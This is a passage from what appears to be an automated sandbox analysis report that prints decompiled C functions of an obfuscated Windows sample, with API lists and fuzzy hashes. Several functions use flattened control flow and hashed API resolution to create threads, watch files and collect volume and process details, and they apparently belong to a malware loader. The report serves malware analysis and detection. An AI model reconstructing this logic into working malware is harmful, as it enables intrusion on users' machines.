                                                      				_t11 =  *( *((intOrPtr*)( *__ecx + 0xf0))());
                                                      				if(_t11 != 0) {
                                                      					goto L3;
                                                      				}
                                                      				return DefWindowProcA( *(__ecx + 0x20), _a4, _a8, _a12);
                                                      			}







                                                      APIs
                                                      • DefWindowProcA.USER32(?,?,?,?), ref: 004080EA
                                                      • CallWindowProcA.USER32 ref: 004080FF
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: ProcWindow$Call
                                                      • String ID:
                                                      • API String ID: 2316559721-0
                                                      • Opcode ID: ded2b2c8f4ccecfeb941fad25af2ba88284cf4473edce49357e56aebb3a01b73
                                                      • Instruction ID: faabefe62c7c53f3fdcbf67010fdb8b980cc00f1b023ec64b7b1c68eccc98f5b
                                                      • Opcode Fuzzy Hash: ded2b2c8f4ccecfeb941fad25af2ba88284cf4473edce49357e56aebb3a01b73
                                                      • Instruction Fuzzy Hash: 84F0AC36100215EFCF119F94DC04DDA7BB9FF19350B058429FA85D6561EB72E820AF54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E004099F5(void* __ecx) {
                                                      				struct HINSTANCE__* _t11;
                                                      				signed int _t12;
                                                      				void* _t15;
                                                      
                                                      				_t15 = __ecx;
                                                      				if( *((intOrPtr*)(__ecx + 4)) == 0) {
                                                      					_t11 = GetModuleHandleA( *(__ecx + 0xc)); // executed
                                                      					 *(_t15 + 4) = _t11;
                                                      					if(_t11 == 0) {
                                                      						_t12 = LoadLibraryA( *(_t15 + 0xc));
                                                      						 *(_t15 + 4) = _t12;
                                                      						 *((char*)(_t15 + 8)) = _t12 & 0xffffff00 | _t12 != 0x00000000;
                                                      					}
                                                      				}
                                                      				return  *(_t15 + 4);
                                                      			}







                                                      APIs
                                                      • GetModuleHandleA.KERNELBASE(?,?,00409AD8,InitCommonControlsEx,00000000,0040A1DC,00040000,00008000,?,?,0040C810,00401257,00040000,00000000,?), ref: 00409A01
                                                      • LoadLibraryA.KERNEL32(?,?,00409AD8,InitCommonControlsEx,00000000,0040A1DC,00040000,00008000,?,?,0040C810,00401257,00040000,00000000,?), ref: 00409A11
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: HandleLibraryLoadModule
                                                      • String ID:
                                                      • API String ID: 4133054770-0
                                                      • Opcode ID: 99fdbea0dc4889e037225810345119da6f3f7b98ba3af548d8b61604cfbc3950
                                                      • Instruction ID: 9317f629b01d5a5b7a74bb67438dee8f2f814220c5d55638b190b1096b737129
                                                      • Opcode Fuzzy Hash: 99fdbea0dc4889e037225810345119da6f3f7b98ba3af548d8b61604cfbc3950
                                                      • Instruction Fuzzy Hash: 80E0BF31612750CFC7248F29E9047877BE4EF14710711C47EE4AAD2A61E734EC40CB04
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 86%
                                                      			E004051C9(void* __esi, void* __eflags) {
                                                      				void* _t3;
                                                      				void* _t4;
                                                      				struct HHOOK__* _t6;
                                                      				void* _t7;
                                                      				void* _t8;
                                                      
                                                      				_t3 = E0040DB94(_t7, _t8, __esi, __eflags);
                                                      				_t13 =  *((char*)(_t3 + 0x14));
                                                      				if( *((char*)(_t3 + 0x14)) == 0) {
                                                      					_push(__esi);
                                                      					_t4 = E0040D673(_t7, _t8, __esi, _t13);
                                                      					_t6 = SetWindowsHookExA(0xffffffff, E00405035, 0, GetCurrentThreadId()); // executed
                                                      					 *(_t4 + 0x2c) = _t6;
                                                      					return _t6;
                                                      				}
                                                      				return _t3;
                                                      			}









                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: CurrentHookThreadWindows
                                                      • String ID:
                                                      • API String ID: 1904029216-0
                                                      • Opcode ID: 2badf78d1823c855d47da0a188e546955e8ac16bfe00ce0fae403d97928034df
                                                      • Instruction ID: d2475072599357dfe44180b5e05b1154fe7956b612fa810acb3a96ea88ad64ab
                                                      • Opcode Fuzzy Hash: 2badf78d1823c855d47da0a188e546955e8ac16bfe00ce0fae403d97928034df
                                                      • Instruction Fuzzy Hash: C7D0A771C046502EDB202FB07C0DB8B3B548B04370F1207B6F420761E1C97CA4854F9D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 76%
                                                      			E023069ED() {
                                                      				short _v520;
                                                      				void* _v524;
                                                      				void* _v528;
                                                      				char _v532;
                                                      				void* _t11;
                                                      				void* _t15;
                                                      				intOrPtr _t30;
                                                      				intOrPtr _t31;
                                                      				void* _t38;
                                                      				intOrPtr _t41;
                                                      				void* _t64;
                                                      
                                                      				_t64 = _v528;
                                                      				_t11 = 0x4b873b7;
                                                      				while(1) {
                                                      					L1:
                                                      					_t38 = 0x2f2b4fae;
                                                      					L2:
                                                      					while(_t11 != 0x4b873b7) {
                                                      						if(_t11 == 0x67b0e11) {
                                                      							E02302F84(0xf568ce83, 0x4129e1b9, 0x2e);
                                                      							_t15 = FindFirstChangeNotificationW( &_v520, 0, 1); // executed
                                                      							_t64 = _t15;
                                                      							if(E02306B8A() == 0) {
                                                      								goto L14;
                                                      							} else {
                                                      								_t41 =  *0x230a4c8; // 0x5b1e18
                                                      								_push( *((intOrPtr*)(_t41 + 0x28)));
                                                      								goto L12;
                                                      							}
                                                      						} else {
                                                      							if(_t11 == 0x22908104) {
                                                      								_push(_t64);
                                                      								 *((intOrPtr*)(E02302F84(0xf568ce83, 0x278beec6, 0x295)))();
                                                      							} else {
                                                      								if(_t11 == 0x252ca1ce) {
                                                      									_push(0x104);
                                                      									_push( &_v520);
                                                      									_push(0);
                                                      									 *((intOrPtr*)(E02302F84(0xf568ce83, 0x738e43f2, 0x169)))();
                                                      									_push( &_v532);
                                                      									 *((short*)( *((intOrPtr*)(E02302F84(0x3b68b8a1, 0x478631ce, 0x6a)))())) = 0;
                                                      									_t11 = 0x67b0e11;
                                                      									goto L1;
                                                      								} else {
                                                      									if(_t11 == _t38) {
                                                      										if(E02306B8A() == 0) {
                                                      											_push(_t64);
                                                      											 *((intOrPtr*)(E02302F84(0xf568ce83, 0xb23a47fb, 0x108)))();
                                                      											L14:
                                                      											_t11 = 0x38b79919;
                                                      											while(1) {
                                                      												L1:
                                                      												_t38 = 0x2f2b4fae;
                                                      												goto L2;
                                                      											}
                                                      										} else {
                                                      											_t30 =  *0x230a4c8; // 0x5b1e18
                                                      											_push( *((intOrPtr*)(_t30 + 0x28)));
                                                      											L12:
                                                      											 *((intOrPtr*)(E02302F84(0xf568ce83, 0x69121cc4, 0x1a8)))();
                                                      											_t11 = 0x22908104;
                                                      											while(1) {
                                                      												L1:
                                                      												_t38 = 0x2f2b4fae;
                                                      												goto L2;
                                                      											}
                                                      										}
                                                      									} else {
                                                      										if(_t11 != 0x38b79919) {
                                                      											L19:
                                                      											if(_t11 != 0x705a742) {
                                                      												continue;
                                                      											} else {
                                                      											}
                                                      										} else {
                                                      											_t31 =  *0x230a4c8; // 0x5b1e18
                                                      											_push(0xffffffff);
                                                      											_push(0);
                                                      											_v528 =  *(_t31 + 0x28);
                                                      											_push( &_v528);
                                                      											_push(2);
                                                      											_v524 = _t64;
                                                      											if( *((intOrPtr*)(E02302F84(0xf568ce83, 0xca2f56c, 0x17d)))() != 0) {
                                                      												_t38 = 0x2f2b4fae;
                                                      												_t11 =  ==  ? 0x2f2b4fae : 0x38b79919;
                                                      												continue;
                                                      											}
                                                      										}
                                                      									}
                                                      								}
                                                      							}
                                                      						}
                                                      						return 0;
                                                      					}
                                                      					_t11 = 0x252ca1ce;
                                                      					goto L19;
                                                      				}
                                                      			}















                                                      APIs
                                                      • FindFirstChangeNotificationW.KERNELBASE(?,00000000,00000001), ref: 02306B39
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.615127704.0000000002301000.00000020.00000001.sdmp, Offset: 02300000, based on PE: true
                                                      • Associated: 00000003.00000002.615121787.0000000002300000.00000004.00000001.sdmp
                                                      • Associated: 00000003.00000002.615142665.0000000002309000.00000004.00000001.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_2300000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: ChangeFindFirstNotification
                                                      • String ID:
                                                      • API String ID: 1065410024-0
                                                      • Opcode ID: 91d006e15cb97cd058256a02d065a481a92146fc24053615573ff2c4a4d8ed83
                                                      • Instruction ID: 0b67ce609fcb1d863d4681b43c50e65f22e8269113ebc4e2a9d353e13410cb5b
                                                      • Opcode Fuzzy Hash: 91d006e15cb97cd058256a02d065a481a92146fc24053615573ff2c4a4d8ed83
                                                      • Instruction Fuzzy Hash: B83127B03443025BDA28A6555CF2B7F629ECB84354F24491AFD15DB3D4CA61CCA1CB72
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.615064004.00000000022E1000.00000020.00000001.sdmp, Offset: 022E1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_22e1000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 91d5ed7235d8a05eafef979527917f5a496c5a4e54ae574ee2da5ffb13ba0340
                                                      • Instruction ID: 0c98aaf483717d3076aee7be4de56651dace5e8f74d8492bf10e4a7c7d8e9eef
                                                      • Opcode Fuzzy Hash: 91d5ed7235d8a05eafef979527917f5a496c5a4e54ae574ee2da5ffb13ba0340
                                                      • Instruction Fuzzy Hash: 3141C674A10109AFDB04DF84C494BAEB7B2FB88314F54C169E81A5B359C775EE92DB80
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 19%
                                                      			E02305AA1() {
                                                      				char _v524;
                                                      				intOrPtr _v548;
                                                      				char _v564;
                                                      				intOrPtr _v568;
                                                      				void* _v572;
                                                      				void* _t14;
                                                      				intOrPtr* _t17;
                                                      				void* _t19;
                                                      				intOrPtr* _t24;
                                                      				void* _t26;
                                                      				void* _t30;
                                                      				void* _t37;
                                                      				void* _t39;
                                                      				signed int _t41;
                                                      				void* _t43;
                                                      
                                                      				_t26 = _v572;
                                                      				_t41 = 0x17978d81;
                                                      				_t39 = 0;
                                                      				do {
                                                      					while(_t41 != 0xaceab63) {
                                                      						if(_t41 == 0xba3fea7) {
                                                      							_push(_t39);
                                                      							_push(_t39);
                                                      							_push(3);
                                                      							_push(_t39);
                                                      							_push(1);
                                                      							_push(0x80);
                                                      							_t37 = 0xb82a8ec3;
                                                      							_push( &_v524);
                                                      							E02302F84(0xf568ce83, 0xb82a8ec3, 0x1a);
                                                      							_pop(_t30); // executed
                                                      							_t14 = CreateFileW(??, ??, ??, ??, ??, ??, ??); // executed
                                                      							_t26 = _t14;
                                                      							__eflags = _t26 - 0xffffffff;
                                                      							if(_t26 == 0xffffffff) {
                                                      								L19:
                                                      								return _t39;
                                                      							}
                                                      							_t41 = 0x308611ab;
                                                      							continue;
                                                      						}
                                                      						if(_t41 == 0x17978d81) {
                                                      							_t41 = 0x1f766521;
                                                      							continue;
                                                      						}
                                                      						if(_t41 == 0x1f766521) {
                                                      							_t37 = 0x738e43f2;
                                                      							_t17 = E02302F84(0xf568ce83, 0x738e43f2, 0x169);
                                                      							_t30 = _t39;
                                                      							 *_t17( &_v524, 0x104);
                                                      							_t41 = 0xba3fea7;
                                                      							continue;
                                                      						}
                                                      						if(_t41 == 0x269b685a) {
                                                      							_t19 = E0230438D(_t30, _t37);
                                                      							_t43 = _v572 - _v548;
                                                      							asm("sbb ecx, [esp+0x2c]");
                                                      							__eflags = _v568 - _t37;
                                                      							if(__eflags < 0) {
                                                      								goto L19;
                                                      							}
                                                      							if(__eflags > 0) {
                                                      								L18:
                                                      								_t39 = 1;
                                                      								__eflags = 1;
                                                      								goto L19;
                                                      							}
                                                      							__eflags = _t43 - _t19;
                                                      							if(_t43 < _t19) {
                                                      								goto L19;
                                                      							}
                                                      							goto L18;
                                                      						}
                                                      						if(_t41 == 0x308611ab) {
                                                      							 *((intOrPtr*)(E02302F84(0xf568ce83, 0x854b8830, 0x4c)))();
                                                      							_t37 = 0x2e998fdc;
                                                      							asm("sbb esi, esi");
                                                      							_t41 = (_t41 & 0xe8cf945b) + 0x21ff1708;
                                                      							_t24 = E02302F84(0xf568ce83, 0x2e998fdc, 0x167);
                                                      							_t30 = _t26;
                                                      							 *_t24(_t26, _t39,  &_v564, 0x28);
                                                      						}
                                                      						goto L13;
                                                      					}
                                                      					_push( &_v572);
                                                      					 *((intOrPtr*)(E02302F84(0xf568ce83, 0xac6e2571, 0x1fb)))();
                                                      					_t41 = 0x269b685a;
                                                      					L13:
                                                      				} while (_t41 != 0x21ff1708);
                                                      				goto L19;
                                                      			}



















                                                      APIs
                                                      • CreateFileW.KERNELBASE(?,00000080,00000001,00000000,00000003,00000000,00000000,?,2895FB0B,?,?), ref: 02305B96
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.615127704.0000000002301000.00000020.00000001.sdmp, Offset: 02300000, based on PE: true
                                                      • Associated: 00000003.00000002.615121787.0000000002300000.00000004.00000001.sdmp
                                                      • Associated: 00000003.00000002.615142665.0000000002309000.00000004.00000001.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_2300000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      • Opcode ID: 727a16866b20b17e7bd20a99c9fb0f2b9f5606ecfee9563051ca270abacf030b
                                                      • Instruction ID: 368c2ca0f223c23f9a880655dd22f69253e503c86b2fab4e052684639cb8475b
                                                      • Opcode Fuzzy Hash: 727a16866b20b17e7bd20a99c9fb0f2b9f5606ecfee9563051ca270abacf030b
                                                      • Instruction Fuzzy Hash: 5531A862A443151BD934A46C4CE4E7FA29EEBC0310F88401AFE65AB2C0CE219D088FB2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 82%
                                                      			E02306C6B(void* __edx) {
                                                      				void* _t5;
                                                      				void* _t7;
                                                      				intOrPtr _t11;
                                                      				intOrPtr _t17;
                                                      				intOrPtr _t20;
                                                      				long _t21;
                                                      
                                                      				_t5 = 0x32041aca;
                                                      				while(_t5 != 0x243b5bf4) {
                                                      					if(_t5 == 0x24b7ea00) {
                                                      						_push(0);
                                                      						_push(0);
                                                      						_push(0);
                                                      						_push(0);
                                                      						_t11 =  *((intOrPtr*)(E02302F84(0xf568ce83, 0x7a3299e5, 0x8a)))();
                                                      						_t20 =  *0x230a4c8; // 0x5b1e18
                                                      						 *((intOrPtr*)(_t20 + 0x28)) = _t11;
                                                      						_t5 = 0x243b5bf4;
                                                      						continue;
                                                      					} else {
                                                      						if(_t5 != 0x32041aca) {
                                                      							L8:
                                                      							if(_t5 != 0x1ef7700d) {
                                                      								continue;
                                                      							}
                                                      						} else {
                                                      							_t21 = 0x3c;
                                                      							_t20 = E02303037(_t21);
                                                      							 *0x230a4c8 = _t20;
                                                      							if(_t20 != 0) {
                                                      								_t5 = 0x24b7ea00;
                                                      								continue;
                                                      							}
                                                      						}
                                                      					}
                                                      					return 0 | _t20 != 0x00000000;
                                                      				}
                                                      				E02302F84(0xf568ce83, 0x83117ba, 0x1d1);
                                                      				_t7 = CreateThread(0, 0, E023069ED, 0, 0, 0);
                                                      				_t17 =  *0x230a4c8; // 0x5b1e18
                                                      				 *(_t17 + 0x38) = _t7;
                                                      				_t5 = 0x1ef7700d;
                                                      				goto L8;
                                                      			}










                                                      APIs
                                                      • CreateThread.KERNELBASE(00000000,00000000,023069ED,00000000,00000000,00000000,?,2895FB0B,?,?,02304C46), ref: 02306CF3
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.615127704.0000000002301000.00000020.00000001.sdmp, Offset: 02300000, based on PE: true
                                                      • Associated: 00000003.00000002.615121787.0000000002300000.00000004.00000001.sdmp
                                                      • Associated: 00000003.00000002.615142665.0000000002309000.00000004.00000001.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_2300000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: CreateThread
                                                      • String ID:
                                                      • API String ID: 2422867632-0
                                                      • Opcode ID: c4c6592be231ddf0af58da8eeb35df0b39591f79b933f47bb8c7e2760f70c365
                                                      • Instruction ID: 597ad8927a7f810df0986f08d9cd9043b34342b801dd444f654c45b9ba565f6a
                                                      • Opcode Fuzzy Hash: c4c6592be231ddf0af58da8eeb35df0b39591f79b933f47bb8c7e2760f70c365
                                                      • Instruction Fuzzy Hash: 94018E243823116BD638996A6CF9E6B2A4DCF85675720042FF90DCB7C8CB21CC61CB70
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 84%
                                                      			E02303C56() {
                                                      				long _v8;
                                                      				short _v528;
                                                      				intOrPtr* _t13;
                                                      
                                                      				_push(0x104);
                                                      				_push( &_v528);
                                                      				_v8 = 0;
                                                      				if( *((intOrPtr*)(E02302F84(0xf568ce83, 0x192bc04b, 0x26)))() != 0) {
                                                      					_t13 =  &_v528;
                                                      					if(_v528 != 0) {
                                                      						while( *_t13 != 0x5c) {
                                                      							_t13 = _t13 + 2;
                                                      							if( *_t13 != 0) {
                                                      								continue;
                                                      							} else {
                                                      							}
                                                      							goto L6;
                                                      						}
                                                      						 *((short*)(_t13 + 2)) = 0;
                                                      					}
                                                      					L6:
                                                      					E02302F84(0xf568ce83, 0xf0a36707, 0xbc);
                                                      					GetVolumeInformationW( &_v528, 0, 0,  &_v8, 0, 0, 0, 0); // executed
                                                      				}
                                                      				return _v8;
                                                      			}







                                                      APIs
                                                      • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 02303CD4
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.615127704.0000000002301000.00000020.00000001.sdmp, Offset: 02300000, based on PE: true
                                                      • Associated: 00000003.00000002.615121787.0000000002300000.00000004.00000001.sdmp
                                                      • Associated: 00000003.00000002.615142665.0000000002309000.00000004.00000001.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_2300000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: InformationVolume
                                                      • String ID:
                                                      • API String ID: 2039140958-0
                                                      • Opcode ID: 526540498414afc7a9409e39192442dbad502c389ee1e6e538a6c4f33c4457d3
                                                      • Instruction ID: 9cc9c4dcd10e7750473063f400c163ae54f48092b4d9abc794d1bf6f4704d1b0
                                                      • Opcode Fuzzy Hash: 526540498414afc7a9409e39192442dbad502c389ee1e6e538a6c4f33c4457d3
                                                      • Instruction Fuzzy Hash: FC01D4A1901324A7DB34E7659C9DEEBBBBCDF45250F5081C6A819DB1C0D7718E80C6F0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 45%
                                                      			E023032DF(void* __edx) {
                                                      				intOrPtr _v4;
                                                      				char _v16;
                                                      				void* __ecx;
                                                      				void* _t8;
                                                      				void* _t11;
                                                      				void* _t23;
                                                      				void* _t24;
                                                      
                                                      				_t24 = 0;
                                                      				_v4 = 0x104;
                                                      				_push(0);
                                                      				_t11 = __edx;
                                                      				_push(0x1000);
                                                      				_t23 =  *((intOrPtr*)(E02302F84(0xf568ce83, 0x3f0572f9, 0x128)))();
                                                      				if(_t23 != 0) {
                                                      					_push( &_v16);
                                                      					_push(_t11);
                                                      					_push(0);
                                                      					_push(_t23);
                                                      					_t8 =  *((intOrPtr*)(E02302F84(0xf568ce83, 0xa87adc75, 0xf3)))(); // executed
                                                      					_push(_t23);
                                                      					_t24 = _t8;
                                                      					 *((intOrPtr*)(E02302F84(0xf568ce83, 0x2e998fdc, 0x167)))();
                                                      				}
                                                      				return _t24;
                                                      			}











                                                      APIs
                                                      • QueryFullProcessImageNameW.KERNELBASE(00000000,00000000,?,?), ref: 02303330
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.615127704.0000000002301000.00000020.00000001.sdmp, Offset: 02300000, based on PE: true
                                                      • Associated: 00000003.00000002.615121787.0000000002300000.00000004.00000001.sdmp
                                                      • Associated: 00000003.00000002.615142665.0000000002309000.00000004.00000001.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_2300000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: FullImageNameProcessQuery
                                                      • String ID:
                                                      • API String ID: 3578328331-0
                                                      • Opcode ID: 3e0b6e9ad44e8c0294e2eface8104f694cf6329e340b8a8f4a8d1be8b90cdd96
                                                      • Instruction ID: 4c0d3ee596e6bf032ed11f7d20f35ee9d282f88b13ed1b098405d0857c12a9d3
                                                      • Opcode Fuzzy Hash: 3e0b6e9ad44e8c0294e2eface8104f694cf6329e340b8a8f4a8d1be8b90cdd96
                                                      • Instruction Fuzzy Hash: 2AF0E0623453563BE13856695C5CE6BE69ECBC5BA5F20062EB905DB2C0DEA5CC048370
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E0040A3D5(void* __ebx, struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				void* _t10;
                                                      				long _t11;
                                                      				void* _t15;
                                                      				void* _t16;
                                                      				struct HWND__* _t18;
                                                      
                                                      				if(_a8 != 0x360) {
                                                      					_t18 = _a4;
                                                      					_t10 = E00409CBE(_t15, _t16, _t18, __eflags, _t18);
                                                      					__eflags = _t10;
                                                      					if(_t10 == 0) {
                                                      						L5:
                                                      						_t11 = DefWindowProcA(_t18, _a8, _a12, _a16);
                                                      						L6:
                                                      						return _t11;
                                                      					}
                                                      					__eflags =  *((intOrPtr*)(_t10 + 0x20)) - _t18;
                                                      					if(__eflags != 0) {
                                                      						goto L5;
                                                      					}
                                                      					_t11 = E0040A2E8(__ebx, _t16, _t18, __eflags, _t10, _t18, _a8, _a12, _a16); // executed
                                                      					goto L6;
                                                      				}
                                                      				return 1;
                                                      			}











                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a17bd75e753565c8c32fb72635d9df3520f5a8b73c1fc148d280dd7364c2ad56
                                                      • Instruction ID: 3517ec6858cdfff4f58573c3d98e2797eedff766390b39a1751ee799ad3f77ef
                                                      • Opcode Fuzzy Hash: a17bd75e753565c8c32fb72635d9df3520f5a8b73c1fc148d280dd7364c2ad56
                                                      • Instruction Fuzzy Hash: 57F01236404219BBCF129F919C08CDB3B69FF19350F00C436F91561192C379C931ABAB
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b936a4012c24706efac4ff068db0b712045a314d1aab1eb0685984eebb805aa3
                                                      • Instruction ID: c99c244189d94d7dca9a997e17c70eaa2b4c72b9032cbafb8dd16296e0632aa4
                                                      • Opcode Fuzzy Hash: b936a4012c24706efac4ff068db0b712045a314d1aab1eb0685984eebb805aa3
                                                      • Instruction Fuzzy Hash: AFE080F51242119BCB204E24D4417AB7FD85B51736F205B3FD0B1E32D0D27689C3AB1A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 022E14A0: SetLastError.KERNEL32(0000007F), ref: 022E14DB
                                                      • ExitProcess.KERNEL32 ref: 022E2620
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.615064004.00000000022E1000.00000020.00000001.sdmp, Offset: 022E1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_22e1000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: ErrorExitLastProcess
                                                      • String ID:
                                                      • API String ID: 1697593849-0
                                                      • Opcode ID: d603c8b69f5236d9a85b1413eafd00f40e9b55def37d28c1f9e7916c3f45cd9b
                                                      • Instruction ID: fea02d1ba56298fd02b378ba1a20352e930b3d77cdb32f78236b931b4fc6bd47
                                                      • Opcode Fuzzy Hash: d603c8b69f5236d9a85b1413eafd00f40e9b55def37d28c1f9e7916c3f45cd9b
                                                      • Instruction Fuzzy Hash: BBE0EDB5D10208ABEF40EFE4D849BADBBB5AB04701F808564E91667244E6705B14AFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E00405BFB(void* __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
                                                      				intOrPtr* _t6;
                                                      
                                                      				_t17 = _a8 - 0x110;
                                                      				if(_a8 != 0x110) {
                                                      					__eflags = 0;
                                                      					return 0;
                                                      				}
                                                      				_t6 = E0040EC19(0x435490, E00409CBE(__ecx, __edi, __esi, _t17, _a4));
                                                      				if(_t6 == 0) {
                                                      					return 1;
                                                      				}
                                                      				return  *((intOrPtr*)( *_t6 + 0x148))();
                                                      			}





                                                      APIs
                                                      • KiUserCallbackDispatcher.NTDLL(?,0041E007,?,00000110,?,?), ref: 00405C23
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: CallbackDispatcherUser
                                                      • String ID:
                                                      • API String ID: 2492992576-0
                                                      • Opcode ID: 8788a7d1b342c7a73f8b4dbd68cddcdd91617aaa1f30f57faead809fcf95685c
                                                      • Instruction ID: 13a74c7961ba7f7106fd47ab7c0937022831a7dfd7673cd185c48f694b9ae367
                                                      • Opcode Fuzzy Hash: 8788a7d1b342c7a73f8b4dbd68cddcdd91617aaa1f30f57faead809fcf95685c
                                                      • Instruction Fuzzy Hash: 88E0C23560CB0D9EFB18A2318946A6B3294DB84309F204C3BE407E11D1DB3D8C816D0D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 90%
                                                      			E02304F76(signed int __edx) {
                                                      				struct HINSTANCE__* _t6;
                                                      				void* _t8;
